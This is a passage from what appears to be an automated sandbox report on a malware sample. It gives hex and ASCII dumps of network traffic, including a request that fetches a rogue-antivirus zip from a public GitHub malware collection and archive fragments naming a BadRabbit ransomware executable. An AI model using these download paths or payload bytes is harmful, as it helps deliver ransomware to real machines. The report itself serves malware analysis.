c7 5b 42 f4 a4 5f fe b5 7a 08 c5 2c 5e b6 11 5b c3 7f 55 fc 28 ee 7c 89 0a 28 03 58 82 b4 f9 8d ef fb ab 51 92 d6 37 a2 ae 37 d8 de 69 5f 3e 6e c9 cb 01 34 cb 21 d7 54 ed 23 e0 cd 4b fd 8b b7 56 59 40
                                                                                                                                                Data Ascii: ~awoiRv,H$G\6v)8kRI.*f!EA@g&%yFW%BZI1Wp6~-FyA!m6WpuvFf~/&EU*\4j"I[B_z,^[U(|(XQ77i_>n4!T#KVY@
                                                                                                                                                2022-09-29 12:49:40 UTC9733INData Raw: c5 d5 28 b6 ff ae c4 31 9f 3a 0a e9 85 e0 09 59 6f ee 05 54 f5 4c e9 cb 96 39 76 dc 7f 3a 8d c3 cb 5e 9a 9c 98 69 06 ae d3 08 e8 b8 b5 f9 dd ea 85 36 32 8a b1 c0 a6 ab 95 2b b6 09 6a ee 70 9c bb 04 bf 4b ed b9 5f 87 ee fb 73 fa bd 84 f8 8e 14 1e 04 9f 98 32 3c e3 c9 d6 e6 53 bb 56 5a fc cc 49 86 93 fd 55 82 42 09 0a 75 da 9a 67 a6 27 88 6c 82 01 ed 8e 7c 6b 7b b3 33 fd ca e3 4f 1f b4 96 2a 7d 3e 1d f7 40 05 34 74 fa 05 53 55 13 af c7 1e cb cb 7f 65 b0 1d e4 f2 82 64 e9 f0 f8 9c e4 ce 55 32 e4 60 e2 7f a7 8b b2 18 ca c6 f0 dd d8 9d 2f 6c 46 9f 1b 8f 4a 09 d5 90 30 23 b1 83 88 0a 3b 6d 48 79 6f 07 75 f1 04 45 68 14 f4 cf 25 8f 59 e1 af 94 8a 09 47 6e be 4e 9d cd 34 7b bb 1f 6c 96 26 d4 66 4f e8 8c eb 71 0f 47 2d 51 5c 86 0c 3d 1f b9 33 13 dd 2c 63 1c 55 8e
                                                                                                                                                Data Ascii: (1:YoTL9v:^i62+jpK_s2<SVZIUBug'l|k{3O*}>@4tSUedU2`/lFJ0#;mHyouEh%YGnN4{l&fOqG-Q\=3,cU
                                                                                                                                                2022-09-29 12:49:40 UTC9749INData Raw: 20 02 3a c1 52 48 36 73 88 37 04 bc 20 23 b1 b4 54 20 ef ea 16 62 1f 0b 6d 6e 9b ae 3e 40 dc 09 f6 de 51 47 cb f8 84 c4 fa fd 4b 16 62 3e a9 b0 ac d8 99 71 a5 ed 55 0e 45 b3 1c 3c ed d4 c6 da 8d c7 9e 40 82 c4 5e e9 d5 46 a1 1f ec fe 44 39 a5 a8 d9 5c 59 cd 5b e5 05 56 83 48 35 fb 58 03 0c b9 cb 83 0a 18 1b 83 33 31 c4 45 3b 2b bc 1c c2 4a 39 98 32 dc a8 c6 11 01 0e e6 86 b9 55 bb ad 64 b9 cf e1 2a 84 09 75 ff 61 5f 7d 70 51 ab 91 c5 04 52 31 90 cd 46 ef 72 63 93 6f 6a 16 9e e4 80 33 f4 1f 43 9e ee ce 50 00 3c 1b 5f 65 24 15 5a 1f 3e 94 9b 62 d6 b1 30 f6 c7 7b f3 20 cf 16 ea ad 64 af 17 a0 ad 60 8e 76 c1 d2 47 36 ea 66 63 a2 b3 3c 37 15 2c 48 9b 62 c2 e3 d4 65 d9 cf c7 cf dd ea f1 5a 51 8e 60 fb c4 86 6d ae f0 1d 0e ea c6 31 2f 01 fa 4a 2b 09 f4 91 2d 80
                                                                                                                                                Data Ascii: :RH6s7 #T bmn>@QGKb>qUE<@^FD9\Y[VH5X31E;+J92Ud*ua_}pQR1Frcoj3CP<_e$Z>b0{ d`vG6fc<7,HbeZQ`m1/J+-
                                                                                                                                                2022-09-29 12:49:40 UTC9765INData Raw: 58 34 d4 ae 2f db 7e 76 bc 43 55 a9 4b d7 3f 03 10 6d 0b b3 aa ab a5 a6 0c 1f 83 01 9f 4a aa bc 7d 94 a2 bb a2 14 53 92 96 55 e6 5c d8 72 09 5c a8 b9 f4 8a 84 fd 03 67 21 11 58 ff 7e b9 72 db 3d b5 58 77 8d 82 05 eb e5 bf c7 e4 c9 71 53 eb ea 45 ee e2 d0 ce 5a 23 bc 1d a5 18 9a 85 36 72 2e 08 f5 3b a5 88 10 4b 58 5d 65 69 a6 92 4c 72 94 11 4a af 9d 86 b8 24 38 73 f7 c5 6b 2c fd d9 a6 37 ab 27 c8 1e c1 00 3f d8 29 75 bb ff 99 f2 e4 b0 a7 21 5e 8c 2b 68 31 fa 73 12 33 59 bf 64 9b cd 80 e2 2e 73 5d 0b 75 09 61 f1 96 83 ca 6f b0 dd ca 32 50 17 af 8a 8a 44 86 b1 85 5f e2 1f 80 ea 61 11 eb 31 d3 55 77 cb 8a e7 3c 4c f2 69 86 d3 97 89 1e 32 3e e7 84 38 4b 25 e3 a5 c1 27 1e 3f c6 68 df 19 66 36 75 98 e8 16 72 a7 d0 a1 bb 88 e8 a7 2e 55 b8 e9 e3 4f 75 a2 13 d9 1a
                                                                                                                                                Data Ascii: X4/~vCUK?mJ}SU\r\g!X~r=XwqSEZ#6r.;KX]eiLrJ$8sk,7'?)u!^+h1s3Yd.s]uao2PD_a1Uw<Li2>8K%'?hf6ur.UOu
                                                                                                                                                2022-09-29 12:49:40 UTC9781INData Raw: 0b a2 63 b4 d2 02 d7 dc bf de 47 ab 74 a0 a5 34 80 a3 33 15 ef f7 1b cc 76 2c cc 79 3e d3 ac 4a 3a bc 5f ac bb 6b 85 1f d8 5a 9b a6 c0 f1 ca 12 11 1c 60 f4 a5 a7 96 70 89 c4 af bf 46 ce 5d 11 cf cc 35 dd a3 9f d4 bc 8a fa 6c e0 a6 24 d5 0a 01 fe 91 c1 ba 31 4f ef 9c 3e ab 05 ae 76 c6 e9 8e 8e 79 9f 28 ca 83 c9 20 a0 eb 22 14 29 f5 e4 7f 96 b0 c6 99 3b 64 e9 54 1e b5 0c a0 9b fe a9 de 53 2f 8c 89 ec 72 4b 91 b9 22 6a d5 46 93 9d 9e 50 fc 8b 7e c7 0a a7 d0 b0 17 ac b6 f5 09 c9 04 ba 78 59 d5 c1 30 05 96 53 4b 6b e2 5e 69 9b 3c 26 c6 c7 01 69 31 1e 99 ee eb 3c 2e 3e 6b 70 88 7a 3c 43 fc 3b 60 6c 93 1d 69 d0 f1 6b 52 97 a5 6f ee 0a fb 8a c5 63 e8 62 bd 3b ca 56 5d a9 ed 03 75 cd bd a1 eb 37 3c b5 b2 c5 b1 fb 4f 99 7d 57 3f 7e 82 2e 2b 4e dc ec d3 34 2c e9 86
                                                                                                                                                Data Ascii: cGt43v,y>J:_kZ`pF]5l$1O>vy( ");dTS/rK"jFP~xY0SKk^i<&i1<.>kpz<C;`likRocb;V]u7<O}W?~.+N4,
                                                                                                                                                2022-09-29 12:49:40 UTC9797INData Raw: ee ee 4f 6f 24 3e 24 69 b6 eb b5 06 0c e7 bb a3 58 c3 da cb 6b ca fa 33 f3 d7 b0 91 93 eb 7f cf 01 0b 58 8e 6e 1b cf 93 0c 59 12 9f 2d 57 ac 7f b6 59 bf 6d 5d 9d 53 a5 d0 69 82 a6 f5 ab 41 fe 91 90 61 8b ac f5 f6 8c 9f 57 4f 1d 58 dd b0 d1 5a 5c 6f 96 8d 48 67 24 8a e1 ea 38 8e 23 53 6c f5 40 2a 78 f8 d0 71 1d 89 f0 69 68 98 b5 f9 0a 23 ba 56 39 4a 1c 64 d8 a1 23 9d 2c db 70 33 e8 72 6c e4 b5 d6 39 32 aa dc 4a a9 77 30 33 a5 ca 8e f6 af 7d 57 e9 f3 a8 81 6f d4 2c 7d 58 25 74 48 68 da 85 10 e2 3d c4 85 22 2c d0 5c dc 60 ef 28 7f 2b 10 1d bb a2 3c d2 ec 95 07 4a e7 66 b4 cf 43 e5 5d 74 a5 02 08 68 fc 32 9b 57 d1 5c d3 0c 4b 4b b4 38 4c df 02 12 c8 47 e8 e7 be fe 63 79 4e 7c 1e a1 5e 63 01 26 96 c4 45 e8 45 e7 5e 42 20 59 7e 41 25 cd f5 50 fe 8d a6 ca a4 23
                                                                                                                                                Data Ascii: Oo$>$iXk3XnY-WYm]SiAaWOXZ\oHg$8#Sl@*xqih#V9Jd#,p3rl92Jw03}Wo,}X%tHh=",\`(+<JfC]th2W\KK8LGcyN|^c&EE^B Y~A%P#
                                                                                                                                                2022-09-29 12:49:40 UTC9813INData Raw: 9a f2 54 55 a8 c4 54 83 18 53 7d b9 49 44 72 17 40 85 3b a4 3f c9 cd af 38 82 6e fd 48 ee 30 80 94 60 1d 25 57 a4 61 9a 2c 7a 84 c4 be 10 fc bc 47 46 56 5d 90 f1 59 13 66 b3 3f 34 7f 54 e3 9b 1b 2a e2 1f fa b2 4c 58 21 7e a5 49 e1 7e 4c 18 e0 d3 74 28 89 65 5f 09 99 11 2c d9 6e 7a ce 11 8c f8 96 24 ed 0a bb e0 44 1e 79 17 49 f4 1e c8 15 20 dc b3 a8 2f d3 b8 8f b0 e5 5f dd 08 2b db 6c 88 79 5d 12 79 9f 0b 69 d5 56 bd bd 2c 29 c1 0f 39 c5 80 ba bd 63 c9 6b d3 11 63 73 8e 98 44 22 6c ad f1 02 0c 26 01 87 7a cb f3 97 f7 14 34 5b 2c 52 14 d8 85 9a d9 07 0a 79 14 8e 7e 9e ba bf e8 9f de 59 af d9 66 77 f0 e0 1a 2b ec ae e5 bf 82 9a 1e d7 94 f4 1e 51 67 83 f7 5e ed ab b9 d6 7a 7d 1f 9c b8 16 3a 9f 96 a4 d1 10 ee bc 16 1f 4d dd 69 20 60 72 6a b4 93 c6 62 1d 6b 6e
                                                                                                                                                Data Ascii: TUTS}IDr@;?8nH0`%Wa,zGFV]Yf?4T*LX!~I~Lt(e_,nz$DyI /_+ly]yiV,)9ckcsD"l&z4[,Ry~Yfw+Qg^z}:Mi `rjbkn
                                                                                                                                                2022-09-29 12:49:40 UTC9829INData Raw: 53 eb 67 1f bf 7e f8 24 75 4e a8 14 cc 41 04 85 11 f2 88 ef f7 9a 4e 38 db 59 09 d3 fd 97 e4 51 1e 96 69 ef 9e ff d9 0c fb bc 7e 9f 91 1c 6b f0 8d 73 37 f5 39 62 ee 26 45 e5 23 0c d9 ec df 27 c7 c3 bf 02 dc c5 50 7b d9 e1 39 ed 1a 5b 1f 48 c3 7d 14 55 fa c1 fc 04 af a8 5e 65 0f f4 7e e1 be af fb 99 28 32 be 33 c3 8c 9b fc 8a a4 e3 c5 5c f8 86 4e d7 f5 fc 9b bb 1c 83 59 f9 90 06 2f 40 04 d0 89 4a 66 fa 8d eb f2 5c f9 7b ef 73 be 7f 21 cd ae c7 1c 3d 14 1a 20 bf 48 49 cb 52 87 23 a6 29 9e 1d 70 9e e4 c8 20 b4 1a 51 b0 0e 43 b1 b3 f5 71 e4 50 21 dc e8 41 b5 ef 6a 41 57 e8 19 0f 34 44 73 85 8f 57 f2 8c db 31 52 ab 1d 66 08 d8 5f 2b 47 98 fe e2 b1 6b 29 d6 19 ed 38 71 c7 22 39 01 d7 55 81 de 97 5e e9 71 da 8b 37 c9 05 c6 c0 56 d2 64 dc 2c 8c 1a 1c f5 15 a9 80
                                                                                                                                                Data Ascii: Sg~$uNAN8YQi~ks79b&E#'P{9[H}U^e~(23\NY/@Jf\{s!= HIR#)p QCqP!AjAW4DsW1Rf_+Gk)8q"9U^q7Vd,
                                                                                                                                                2022-09-29 12:49:40 UTC9845INData Raw: 27 60 69 d4 bc 19 d1 50 17 0a 48 c6 71 e5 5d 0b 9d 83 42 3d 95 08 46 73 7d 03 e8 49 3e 0b 99 6e cf cb b9 3c a8 96 3b b3 6f ca 46 2b 88 b8 97 6d 2e d0 a1 e1 b4 fc a5 4e c3 84 6b c2 75 90 05 5e 39 da 76 76 d8 ff 17 4c 61 fc 86 ee 1f e3 38 bd f2 71 d8 03 31 e6 e0 6b 2e 15 a2 95 5c 39 90 38 1f 7f 79 48 d3 ab b2 e9 e5 1d 23 28 87 d5 9d 11 de 2b c9 9b 54 05 3c 4e 32 b9 d0 7a 9a 6d 99 fe 02 75 36 b8 9c d0 e2 f5 17 9a 90 6e e4 a0 e2 71 41 73 81 74 94 69 e9 f4 4b 2c ee d4 37 66 24 47 66 d9 a4 fa ab 6a 28 8b 61 c9 a2 27 b0 91 5d de 53 b1 1e 59 3c ec d0 f9 ca 38 fc ff 86 3e 28 c7 82 08 7b 9f da d1 ec 02 f4 ce d9 c6 f6 77 3f 45 9c b5 19 3c 2a ed ec b3 76 9d 37 5e d4 4c f7 44 99 20 2b 39 36 49 f4 0e 48 26 44 ec 0e ab 0b 65 ef bf 91 c9 d9 7b 60 58 57 a0 a0 63 8a e1 bc
                                                                                                                                                Data Ascii: '`iPHq]B=Fs}I>n<;oF+m.Nku^9vvLa8q1k.\98yH#(+T<N2zmu6nqAstiK,7f$Gfj(a']SY<8>({w?E<*v7^LD +96IH&De{`XWc
                                                                                                                                                2022-09-29 12:49:40 UTC9861INData Raw: 4a 5f 57 8d a0 1e 9b 2f 0a 1f 9e b3 f4 03 35 68 e2 ea 12 8d c6 e4 68 4f f0 d1 6f 44 fd 53 7d eb 4d 8a d2 b0 76 6a 04 8c 7d 05 ac c3 b9 63 84 3c be 6e 81 05 c5 e5 ad a8 a1 80 79 06 d2 d8 e0 9e 3a 0b 32 9b 46 90 cc 98 6c c5 11 30 bb 81 9d 28 d6 0a 1c 37 ed 60 c8 29 8b 40 07 7d 0d d9 cb 34 ca 5f 79 19 a2 1f 85 87 21 d3 66 ed bd 7f 67 33 f9 3c f6 c7 27 b3 e7 54 40 26 57 38 16 e1 3b c1 7a c8 68 42 ad 07 7f 1b fb af ae 33 8f 71 2f 5e 4a 14 b1 70 87 f8 3c ca 2a c4 3d ab d3 ca 7a ec 44 38 1f cd af 05 7a 78 d1 da ca db 9f 8c 98 b8 f1 86 f0 26 99 71 d9 0b e8 95 a8 5e e9 db 01 9d 77 ee 40 7a 4e 16 d3 86 88 d8 c8 43 13 51 03 75 4f ce e7 1f 70 b8 9e f2 10 20 cb 90 ab 7f b4 88 cd 44 64 fd ad fa 27 69 5b 76 ad c7 69 79 ab 7b a1 b2 47 c5 f5 87 1d ae c1 8f f3 f7 be 67 90
                                                                                                                                                Data Ascii: J_W/5hhOoDS}Mvj}c<ny:2Fl0(7`)@}4_y!fg3<'T@&W8;zhB3q/^Jp<*=zD8zx&q^w@zNCQuOp Dd'i[viy{Gg


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                68192.168.2.349755140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:43 UTC9863OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                69140.82.121.4443192.168.2.349755C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:49:43 UTC9863INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:30 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:49:43 UTC9863INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                7185.199.108.133443192.168.2.349686C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:20 UTC183INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 402632
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:48:20 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6974-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455700.417369,VS0,VE1
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: fdac41e3cda27c4fca2d87753662455dcfa6b1a1
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:53:20 GMT
                                                                                                                                                Source-Age: 277
                                                                                                                                                2022-09-29 12:48:20 UTC183INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                2022-09-29 12:48:20 UTC199INData Raw: 72 c8 31 c2 9d f7 2e 41 53 ac c7 27 ce 6b c8 aa ef 81 64 8e b4 61 a3 68 c9 b2 4f 51 0f 0c d0 0b 4c 71 6f ed 6f 20 9a 1c 07 c1 6d 4b ad 82 2e 0c d8 76 e0 4e c7 34 dc 23 56 fe 18 59 7d 9d 34 7a 07 81 2e 22 f6 07 d6 af 92 93 9e 99 79 2c 0b b5 1d 5d 9f 43 60 6b 35 90 10 b0 c8 29 dc 00 bb 73 51 54 95 38 6c 8c 8f 1a 0c 72 e7 4d 5b b9 96 5b f8 d4 55 f8 09 c0 2a 6f 2d 76 fb 69 8d 7a f1 e9 d7 35 17 79 fe 2e 8d 55 4d c4 34 a7 1b 02 fe 6e da 8b 97 a7 6e 37 9d 8e cd ae 2b 76 01 4d 9e 15 87 c4 e4 66 02 e2 98 84 31 d0 d4 14 3d 69 e4 12 90 c3 81 a2 a1 71 8a 43 d3 5b c6 fb 0f 0a 40 50 0f e0 8e 4a 58 d9 62 7b 0b 99 1d df 17 a6 67 a8 30 f0 a7 69 b9 75 d6 77 57 ef e2 8b a1 25 9f 21 41 dd f6 20 66 52 70 20 57 c0 71 32 bf ee 40 86 cb d3 32 03 76 87 d4 20 f2 0c 0a 9e 32 dd 55
                                                                                                                                                Data Ascii: r1.AS'kdahOQLqoo mK.vN4#VY}4z."y,]C`k5)sQT8lrM[[U*o-viz5y.UM4nn7+vMf1=iqC[@PJXb{g0iuwW%!A fRp Wq2@2v 2U
                                                                                                                                                2022-09-29 12:48:20 UTC215INData Raw: df 68 45 73 e0 48 d9 9a 68 44 7f cf 25 7e 2c f7 a7 f0 68 54 12 ed d0 2a 22 31 10 ac a1 e1 77 4c 42 a9 31 71 f8 97 16 75 01 a1 1e e1 e1 17 fe 10 23 57 f6 34 80 ff 56 f2 aa 8a 75 ce 91 d4 8c 17 b0 44 67 6d fb 81 09 a0 08 4a fe 24 1e 2f a0 22 14 da d0 bb eb 65 1c fe 98 44 82 fc 8d e5 aa 15 d7 39 42 ae ee c7 8d d4 a1 d4 02 21 3b 0b 24 38 c4 0b d7 38 98 f6 c4 fc a6 80 1d 85 23 73 a9 a9 15 94 27 53 8a 2e 99 55 5e d4 a2 78 66 8e 6d d4 f6 02 ed 7e 13 40 15 8b b9 82 b2 dd 13 fb f0 5b 1e 54 0f 2e 43 8b ca 26 60 fe a3 8e 21 1a fa df 98 d7 6a 59 63 d7 16 27 df f6 07 fe 81 80 1b f1 18 90 3b 3d 7f 64 eb 30 2b d7 59 85 a0 c7 bf 41 be d8 4a d4 0e bd 61 31 21 ea 8f c9 86 ad 0f 6b 39 52 a9 14 fd f1 7d 1f fc 66 70 5c b7 2a 1f d3 7d 54 f2 17 8e a5 98 7e 5b 75 54 c0 49 10 62
                                                                                                                                                Data Ascii: hEsHhD%~,hT*"1wLB1qu#W4VuDgmJ$/"eD9B!;$88#s'S.U^xfm~@[T.C&`!jYc';=d0+YAJa1!k9R}fp\*}T~[uTIb
                                                                                                                                                2022-09-29 12:48:20 UTC231INData Raw: c3 a0 6b 5f 9d ce 11 cf 59 14 7f b2 aa 14 34 99 4d ce 0c a5 85 81 79 45 d1 74 4a 6f 00 aa e4 8c 0e 69 de 4e 90 e7 67 97 7d 3a d9 6b f2 d5 9a 38 fb 8f f7 c0 52 ae 61 47 33 08 16 e3 39 ee ee c8 96 3c 11 6c 39 ba 9a b8 7a 07 c4 d8 f2 f7 97 b1 15 17 ff a2 1a dd f1 7e 85 38 2f 9d e5 80 f3 9f b3 d8 5b 23 1b 2a 83 4b d6 52 de b1 99 e2 e9 f5 41 77 0e 1b 02 6f 18 79 c1 5a 06 84 21 c6 39 b2 28 51 0d e3 1a 6a 8a 22 b1 52 ba 7f a3 10 23 0f 18 f4 9b 7f 22 38 8a 2e 9b cb 3a b1 01 19 21 17 c9 ec 7d 6a a8 f1 4a 1b 2a a1 1f b8 83 72 e1 9b ef eb ae 43 20 62 15 6e 87 c4 84 92 cc 79 4c 84 fa b4 10 67 22 48 cd b7 58 d7 8a 11 c3 48 64 fd 1f f6 92 0a ce f6 1a 5f 92 30 a1 92 09 2d 29 75 d9 45 d3 73 d6 61 82 68 6f d7 f8 a1 50 01 d4 f6 b9 38 c0 2f 02 24 0f 42 83 46 db bc b6 e2 80
                                                                                                                                                Data Ascii: k_Y4MyEtJoiNg}:k8RaG39<l9z~8/[#*KRAwoyZ!9(Qj"R#"8.:!}jJ*rC bnyLg"HXHd_0-)uEsahoP8/$BF
                                                                                                                                                2022-09-29 12:48:20 UTC247INData Raw: d3 e8 b3 a5 57 bb 0f 80 8e 4a d0 94 cd 31 b7 fc 52 9b dd ec 1d 0e df e2 b2 72 10 11 45 d0 13 e7 46 73 0e ee 88 25 59 a0 87 52 2a 7f f1 c9 04 38 b2 8a 86 e3 55 b0 df 6d 8e 1c 77 b0 01 ac 10 05 04 6b ae 2b 3b 5e bf 4a ed 73 d8 ab d3 cf fb a8 6e a2 bc 4f 41 2d c4 15 83 39 f0 dd 86 d1 ca 20 b5 c3 a8 59 39 4c 02 66 11 12 8e 3d b1 f1 60 78 f2 6b e1 ac 59 82 ea 00 59 c1 52 94 4e 15 f8 64 8a cb b7 a7 02 ac 35 7d a2 41 76 da e4 c6 75 30 50 5a d7 bc ec 8f b5 23 13 c9 ba fb ef 45 7f eb 5a e2 8f 23 36 26 7f 40 df 34 a3 e1 62 b2 12 aa ad e7 23 b5 ca 8b 71 b0 44 0a 27 af dd 1e 19 7d 21 dd be 40 7a 66 f1 99 77 2e 7c dc 11 fd 78 b3 18 30 1a e9 85 ba 8d ad 5b f5 01 38 d7 04 ee 9a 7d 9b 2d 3a 21 53 ff 71 58 63 ea e3 5d 5b aa d2 86 cf c9 f7 50 41 78 22 be a2 af af 77 21 ea
                                                                                                                                                Data Ascii: WJ1RrEFs%YR*8Umwk+;^JsnOA-9 Y9Lf=`xkYYRNd5}Avu0PZ#EZ#6&@4b#qD'}!@zfw.|x0[8}-:!SqXc][PAx"w!
                                                                                                                                                2022-09-29 12:48:20 UTC263INData Raw: 9f 8c 81 5a e1 61 65 95 8f cc a2 6e e0 37 5b 40 bf cf de df 7f 30 4e c4 a4 a4 14 6c a5 a4 3e 3b 32 39 ff 30 2f c3 ed af 76 75 0a a1 44 6b d1 d5 e7 ce 30 e9 f3 b2 51 21 30 02 31 4a 3a f3 7d 4c 47 9f 37 81 61 20 f0 24 e0 40 e2 f4 11 69 06 c1 e5 da 68 f6 69 da f1 a8 6a f0 d5 a3 85 b1 b1 09 83 b7 cb 7a 5c 58 d7 9d 8e c4 83 37 08 26 88 ca 0b bd 39 13 32 c4 8f 4a 58 c4 bc bb b9 ec bb fd 1a 09 ac ed 3b 04 a3 46 1a ed 64 16 1a f8 bd ba 5e d2 6b cb 90 6c 03 35 4f 84 50 70 ad 4a d0 df 47 d5 45 6b af 9d d4 e0 9b 68 3f 90 45 96 04 05 49 ea 2d 74 67 09 3f f6 24 51 df 6c 99 ec c5 8c f6 9d 59 93 1f 24 5d 0c 81 bb 8a c2 bc 3b 5d 69 ba 18 5e f1 aa 37 5c a9 5b d7 6f 6c 1c ba 02 d0 af 63 c7 70 af 52 c8 45 95 ee 6b 4d 68 57 cc c4 33 db 39 a3 05 b7 b7 6e 10 0b 85 9f aa 69 12
                                                                                                                                                Data Ascii: Zaen7[@0Nl>;290/vuDk0Q!01J:}LG7a $@ihijz\X7&92JX;Fd^kl5OPpJGEkh?EI-tg?$QlY$];]i^7\[olcpREkMhW39ni
                                                                                                                                                2022-09-29 12:48:20 UTC279INData Raw: 11 1b be 72 2a 9b ac 24 a6 6f d8 66 50 56 81 1f 92 36 08 2a 93 7a dd 7d 06 0e 44 95 94 0a 7e 98 74 6f fa db 94 31 1c c4 1f b4 1d 86 a4 a1 d1 e1 40 d4 9d ad 4b 7d 69 4c f8 2b 15 ac 29 1f c3 92 8c 8c c3 d5 39 a7 cb ce 0a 54 1b 9c 7a 06 85 95 e4 1f a6 6d 48 ba d3 e7 ec e4 f7 d9 e6 03 bf ea e1 48 7f fc 76 cd 8d e7 d5 6f 81 b0 40 29 89 24 11 52 7a c4 89 a8 dd ca 01 9b 14 cd 66 89 e5 5b 32 ef 55 90 2d 79 f7 ae 4f 50 2c 2d 9d da a7 a3 ee f8 e5 2e 08 2d 9f e0 7e 3e 38 67 38 30 2a 9c de 08 b3 ba aa 0d da 44 d4 22 04 bc 5f 6b 86 76 73 da 6a 0c 5c c5 7f 72 5e 25 dc 19 fa 32 9a 0d b2 94 07 a0 01 18 eb a7 77 02 48 54 66 d4 06 42 86 45 c6 28 97 b7 29 76 b6 e9 77 3d ec 66 42 ba bb 7d 87 b2 e0 b3 26 05 14 57 20 e7 ed 14 2e b6 0b 80 70 2b 3c d2 30 8d 0b 60 28 c3 23 b3 31
                                                                                                                                                Data Ascii: r*$ofPV6*z}D~to1@K}iL+)9TzmHHvo@)$Rzf[2U-yOP,-.-~>8g80*D"_kvsj\r^%2wHTfBE()vw=fB}&W .p+<0`(#1
